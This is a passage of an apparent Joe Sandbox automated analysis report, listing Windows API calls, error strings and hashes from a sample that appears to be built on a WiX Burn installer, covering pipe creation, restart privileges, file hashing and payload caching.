                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 008A188E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A1894
                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 008A18D4
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A18DA
                                                                                                                                                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 008A191A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A1920
                                                                                                                                                                                                                                                                                                  • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 008A1A11
                                                                                                                                                                                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 008A1A4B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A1A55
                                                                                                                                                                                                                                                                                                  • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 008A1A8D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A1A97
                                                                                                                                                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 008A1AD0
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008A1ADA
                                                                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 008A1B18
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 008A1B2E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                                                                                                                                                                  • String ID: srputil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 267631441-4105181634
                                                                                                                                                                                                                                                                                                  • Opcode ID: 87f66e67b0bdee2c2741a3ec89da70b9c10bba5f9744e0046d1f332eefbdd0d0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 53dced563e57a6dbce8fc1fbb26adebd90314b2c2781ffc1a0b2307ae322a1fa
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87f66e67b0bdee2c2741a3ec89da70b9c10bba5f9744e0046d1f332eefbdd0d0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EC15376D4123DABEB208F958C48BDFFAB8FF45750F0141AAA914F7641E7749E408EA0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy download source for pseudo bundle., xrefs: 0088C469
                                                                                                                                                                                                                                                                                                  • Failed to copy filename for pseudo bundle., xrefs: 0088C417
                                                                                                                                                                                                                                                                                                  • Failed to copy install arguments for related bundle package, xrefs: 0088C584
                                                                                                                                                                                                                                                                                                  • Failed to copy cache id for pseudo bundle., xrefs: 0088C55F
                                                                                                                                                                                                                                                                                                  • Failed to copy local source path for pseudo bundle., xrefs: 0088C43B
                                                                                                                                                                                                                                                                                                  • Failed to append relation type to uninstall arguments for related bundle package, xrefs: 0088C644
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0088C4AD
                                                                                                                                                                                                                                                                                                  • Failed to copy version for pseudo bundle., xrefs: 0088C72D
                                                                                                                                                                                                                                                                                                  • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0088C3BE
                                                                                                                                                                                                                                                                                                  • -%ls, xrefs: 0088C34C
                                                                                                                                                                                                                                                                                                  • Failed to copy repair arguments for related bundle package, xrefs: 0088C5D0
                                                                                                                                                                                                                                                                                                  • Failed to append relation type to repair arguments for related bundle package, xrefs: 0088C5F1
                                                                                                                                                                                                                                                                                                  • Failed to copy key for pseudo bundle., xrefs: 0088C542
                                                                                                                                                                                                                                                                                                  • Failed to allocate space for burn package payload inside of related bundle struct, xrefs: 0088C385
                                                                                                                                                                                                                                                                                                  • Failed to copy key for pseudo bundle payload., xrefs: 0088C3F3
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for dependency providers., xrefs: 0088C6DE
                                                                                                                                                                                                                                                                                                  • pseudobundle.cpp, xrefs: 0088C379, 0088C3B2, 0088C4A1, 0088C6D2
                                                                                                                                                                                                                                                                                                  • Failed to append relation type to install arguments for related bundle package, xrefs: 0088C5A9
                                                                                                                                                                                                                                                                                                  • Failed to copy uninstall arguments for related bundle package, xrefs: 0088C623
                                                                                                                                                                                                                                                                                                  • Failed to copy display name for pseudo bundle., xrefs: 0088C74F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: -%ls$Failed to allocate memory for dependency providers.$Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of related bundle struct$Failed to allocate space for burn payload inside of related bundle struct$Failed to append relation type to install arguments for related bundle package$Failed to append relation type to repair arguments for related bundle package$Failed to append relation type to uninstall arguments for related bundle package$Failed to copy cache id for pseudo bundle.$Failed to copy display name for pseudo bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy install arguments for related bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy key for pseudo bundle.$Failed to copy local source path for pseudo bundle.$Failed to copy repair arguments for related bundle package$Failed to copy uninstall arguments for related bundle package$Failed to copy version for pseudo bundle.$pseudobundle.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1357844191-2832335422
                                                                                                                                                                                                                                                                                                  • Opcode ID: d4ac4697db82bb434d01644dbdaf3ba7075cb27ff0eb9c727740fa9f440da174
                                                                                                                                                                                                                                                                                                  • Instruction ID: d0715035520fab61a1f06e4f1b670b01eb9dc2af54f9f5946ac6ace445ac94ef
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4ac4697db82bb434d01644dbdaf3ba7075cb27ff0eb9c727740fa9f440da174
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAC1D271A4061ABFDB25EF28CC91E6A77A9FF08714B054129F915EB342DB70EC409BE1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000020,?,00000001,00000000,?,?,?,?,?,?,?), ref: 00864617
                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0086461E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00864628
                                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00864678
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00864682
                                                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 008646C6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008646D0
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0086470C
                                                                                                                                                                                                                                                                                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,80040002), ref: 0086471D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00864727
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0086477D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$ProcessToken$AdjustCloseCurrentHandleInitiateLookupOpenPrivilegePrivilegesShutdownSleepSystemValue
                                                                                                                                                                                                                                                                                                  • String ID: Failed to adjust token to add shutdown privileges.$Failed to get process token.$Failed to get shutdown privilege LUID.$Failed to schedule restart.$SeShutdownPrivilege$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2241679041-1583736410
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6ea1019423ef493d120688077e77fa5064fd75ce590d24339fe5435a11720bfc
                                                                                                                                                                                                                                                                                                  • Instruction ID: f73fa0a118f7569906cd84ac166d578f0c871215380f0acf8d719cd0474122ff
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ea1019423ef493d120688077e77fa5064fd75ce590d24339fe5435a11720bfc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0412B73A4073AABF7215BA59C46F6F7A68FB02751F131125FE10F7681E7658C0086E1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,?,00000000), ref: 00874F0D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,?,0086452F,?), ref: 00874F16
                                                                                                                                                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,?,?,00000000,?,?,0086452F,?), ref: 00874FB8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086452F,?), ref: 00874FC5
                                                                                                                                                                                                                                                                                                  • CreateNamedPipeW.KERNEL32(000000FF,00080003,00000000,00000001,00010000,00010000,00000001,00000000,?,?,?,?,?,?,?,0086452F), ref: 00875040
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0086452F,?), ref: 0087504B
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,pipe.cpp,00000132,00000000,?,?,?,?,?,?,?,0086452F,?), ref: 0087508B
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,0086452F,?), ref: 008750B9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to create the security descriptor for the connection event and pipe., xrefs: 00874F44
                                                                                                                                                                                                                                                                                                  • Failed to allocate full name of pipe: %ls, xrefs: 00874F84
                                                                                                                                                                                                                                                                                                  • Failed to allocate full name of cache pipe: %ls, xrefs: 00875022
                                                                                                                                                                                                                                                                                                  • \\.\pipe\%ls.Cache, xrefs: 0087500C
                                                                                                                                                                                                                                                                                                  • D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD), xrefs: 00874F08
                                                                                                                                                                                                                                                                                                  • pipe.cpp, xrefs: 00874F3A, 00874FE9, 0087506F
                                                                                                                                                                                                                                                                                                  • Failed to create pipe: %ls, xrefs: 00874FF6, 0087507C
                                                                                                                                                                                                                                                                                                  • \\.\pipe\%ls, xrefs: 00874F6E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateDescriptorNamedPipeSecurity$CloseConvertFreeHandleLocalString
                                                                                                                                                                                                                                                                                                  • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1214480349-3253666091
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6ec6ece96d9714a2ba7c122879f128cab7d7be9cbc83a26389c2db53a9ad4f85
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3f6d1301a3013ef36b3565028b8a96c8ec210a01fc9986bb0217d2d93e1d2045
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ec6ece96d9714a2ba7c122879f128cab7d7be9cbc83a26389c2db53a9ad4f85
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9351C332D40A26BBEB219BA88C47FDEBB64FF04720F114121FD14F6291D7B59E409AD1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,00879F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0), ref: 0089FAC7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FAD1
                                                                                                                                                                                                                                                                                                  • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 0089FB0E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FB18
                                                                                                                                                                                                                                                                                                  • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 0089FB5F
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 0089FB83
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FB8D
                                                                                                                                                                                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 0089FBCA
                                                                                                                                                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0089FBE1
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FBFC
                                                                                                                                                                                                                                                                                                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 0089FC34
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FC3E
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 0089FC77
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0089FC85
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                                                                                                                                                                  • String ID: cryputil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3955742341-2185294990
                                                                                                                                                                                                                                                                                                  • Opcode ID: d712505dd669ed2c82a9aef2125a7922b85fa5c316d87bec864c9ca3b2b55725
                                                                                                                                                                                                                                                                                                  • Instruction ID: 329cdeee038e3d7c223fa07c01817acef6f337c749887c54244ccf6752dd8b6a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d712505dd669ed2c82a9aef2125a7922b85fa5c316d87bec864c9ca3b2b55725
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD51D437D40239ABEB359E558C15BDB7AA4FB04761F0540B5BF48FA141E3B49D808AE0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • moving, xrefs: 0087A029
                                                                                                                                                                                                                                                                                                  • Failed to create unverified path., xrefs: 00879F6E
                                                                                                                                                                                                                                                                                                  • copying, xrefs: 0087A030, 0087A038
                                                                                                                                                                                                                                                                                                  • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 00879FCB
                                                                                                                                                                                                                                                                                                  • Failed to reset permissions on unverified cached payload: %ls, xrefs: 00879FF1
                                                                                                                                                                                                                                                                                                  • Failed to get cached path for package with cache id: %ls, xrefs: 00879EC8
                                                                                                                                                                                                                                                                                                  • Failed to concat complete cached path., xrefs: 00879EF4
                                                                                                                                                                                                                                                                                                  • Failed to transfer working path to unverified path for payload: %ls., xrefs: 00879FA4
                                                                                                                                                                                                                                                                                                  • Failed to move verified file to complete payload path: %ls, xrefs: 0087A06C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: Failed to concat complete cached path.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$copying$moving
                                                                                                                                                                                                                                                                                                  • API String ID: 0-1289240508
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5ebee2c1259a4335e0375c44ee261b6ba7662eba8e4475656055dbea388aead8
                                                                                                                                                                                                                                                                                                  • Instruction ID: 58a4f47c75f081d37a060e8549daedb96640c998fa78e51a205014eb632e0018
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ebee2c1259a4335e0375c44ee261b6ba7662eba8e4475656055dbea388aead8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51518D3294051AFBDF226A98CC46FED7B76FF15310F108051F904F52A5E776CAA0AB82
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(0000011C), ref: 008662F8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866302
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastVersion
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 305913169-1971907631
                                                                                                                                                                                                                                                                                                  • Opcode ID: c020b92a022dbfdec53acebf64de9ea121a96aa3dbc3b9d8ed70b5ccf9ce84fb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0109432e5b342750628b232f7251fad17db019e5a76180d3c1a78238f777314d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c020b92a022dbfdec53acebf64de9ea121a96aa3dbc3b9d8ed70b5ccf9ce84fb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F641C571A0026CABDB209B59CC46EEF7FB8FB46724F01015AF505E7341EA319E50CB95
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,00000000,?,*.*,?,?,?,00000000,.unverified,?), ref: 00879BF2
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 00879C19
                                                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00879C79
                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00879C84
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863CC4: GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 00863D40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863CC4: GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 00863D53
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: *.*$.unverified
                                                                                                                                                                                                                                                                                                  • API String ID: 457978746-2528915496
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2fc720fed2cc5268e96cd97ded88379dc916adc5eb73247022d5aeebfc1ad6ca
                                                                                                                                                                                                                                                                                                  • Instruction ID: fe41c26830f7d609398747e5b06df29be9ad93f1b7560939a84ba56a88f375e7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fc720fed2cc5268e96cd97ded88379dc916adc5eb73247022d5aeebfc1ad6ca
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23416D3090052CAEDF22AB64DD49BEAB7B8FF84311F4041E1E948E10A5EB75DEC49F15
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 008A88D0
                                                                                                                                                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 008A88E2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 008A892D
                                                                                                                                                                                                                                                                                                  • feclient.dll, xrefs: 008A88AA
                                                                                                                                                                                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 008A88B9
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 008A88A0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                                                                                                                                                                                  • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
